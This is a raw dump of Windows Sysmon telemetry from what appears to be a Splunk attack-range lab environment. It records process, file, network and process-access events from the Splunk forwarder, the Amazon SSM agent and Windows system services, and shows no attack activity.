154100x8000000000000000214783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.491{4F8D34B0-0EF7-6216-1004-000000003902}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.100{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2425A6BDA8A2B1645757CE0DA5B1A5A,SHA256=CB3EEC9908E2F7C93DD82213947EECA9A268AB99D825339C62F79B336C6AA215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:52.950{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6BAA6FDD1127947CB5A94118AAC5D17,SHA256=6763559843FDD9CABAC0356FFDE07FDB080ABE80147370145C6922DD826DDD4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:50.540{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51211-false10.0.1.12-8000- 23542300x8000000000000000214797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:52.490{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8A732FF6F913FC574655C422AC7A16B,SHA256=A8EF138222EDDF5F34AFE424BD1285D364901FB36F89632B0E614A50F867ED0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:52.147{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D658E91BE977117EEE848F9C7F5A5092,SHA256=DE4FFB992E814435736FC490A42AA13185FD2F5B2CCD48E274A3AFDA05B55A3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:53.966{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A71880AEC946D9E1B97D031D442EADFB,SHA256=D5778E03BC5B55382EC004E6FA006CE756A2BE072BF9C9D2FD1EF2A6DFFC32B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:53.178{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69928E15A9530AC268FE5A7CEDD1B6A4,SHA256=62F41C740CCD52B2DBA93833FC239C0C1D2C7AD315EEDE23E413D4F9EBB58935,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:51.551{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53273-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000285621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:53.263{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:53.263{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:53.263{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:54.966{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32479418C7FA9D248C8F3BE739636B2B,SHA256=F8E6C77FAE26F21D221840AF755FA2532155948592E2CBA35CE69F7F4809801D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:54.412{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52388DCABD36556D74006A02C5FBBB56,SHA256=A2D6AD22E645CC8CE8F251129CEFBAFFB1D32B9D9BA9E2FAB4E4A028649A7C30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:55.981{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C4726CD35449017F4CE8CDCB3D7D662,SHA256=B74B3160333C3924FCC5BA0E5178655860C070452A79FC2AA9B27AC132C5CB37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:55.631{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D58297D054789584394073E3115E9E5,SHA256=D82669FEE8E137230545DEA14391804BAA22FB17E1F794800412EDDC4EBECE89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:56.646{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F79F13BC112DABC09B477C3FA936349,SHA256=C0F9C6AB11B6A83A3CD309E048EFE0EFB036FA6717497CEDB71D22FC58516E04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:57.881{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B60AB19BC193BFD39AF8AA7B50E371C,SHA256=E502537230849A69E68C0F611B14CF8C6567611DDAAB12A1F6669816A2EB1616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:56.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EDBB2C866A1104EAC93AD5CD5FBD791,SHA256=64784E8CFE871FF4CB80E98FDDB0EDC340EEBD3E6E26BD6DAE79A234B17B0D3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:58.928{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCEE7E6B0E188F6ADBEEA3035A28AD7D,SHA256=49597DC7E9BFBC31B65C2016017D87E53F3F615606F1DE8139375374C3EB2231,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:56.723{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53274-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:58.013{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D75B624A5E1DA41047EDDDBBED22F86,SHA256=1C7129F1AC553BBA2AACAE5C4C92133B5160556BD416A5BE96EFDDC143FFE97D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:55.586{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51212-false10.0.1.12-8000- 23542300x8000000000000000214806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:59.943{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B746DE15BDB24185D1B69E65721B1C3F,SHA256=16B24B1C605FFE773D145979E4E42B856954C205A6F1800956B8088653F86A3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:59.044{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86C96150504D1E4A13C21B42040A37E5,SHA256=D22AADB9E0DF77B042FC4886BDDCB28BB05558AAF80F1FAAEF37A5E036E22A2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:00.959{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D5F2DE08BDC506D46793EAFB94E2718,SHA256=AF7C21DBE725CDFA2A98C1D37EBF2B30B572C0039AF80FEBC8A94C0582D3A705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:00.173{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-123MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:00.061{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B46C4827F1DE12CC8464D9D119CFB40,SHA256=1BF9F9E92CBA65172C0C1170BA4675192623055EDF8017C568D1831B05A4D5CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:01.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=714BD72123A3C5C382B89DBD0DD82E80,SHA256=01281145E4A18B989DEFF2628B62BC4F5F7321EFA21ECA910A5061A6D3C85E7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:01.176{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-124MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:01.112{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8694BFE9B3877ACCA75F1321B14C98F1,SHA256=B4CEC5409CACF0BE82D3E817F5FF442625878ECCA2BD9A53E87968AF0F254650,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:02.975{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F719809433372DF576645C4FDEAD63EB,SHA256=70AA69660F749C69484D6D4FA3B04675223083CCE0C1FEA98146B18D627A0667,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.677{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F02-6216-BB04-000000003802}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.677{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.677{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.677{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.677{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.677{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0F02-6216-BB04-000000003802}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.677{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F02-6216-BB04-000000003802}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:02.678{C8EA50B7-0F02-6216-BB04-000000003802}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 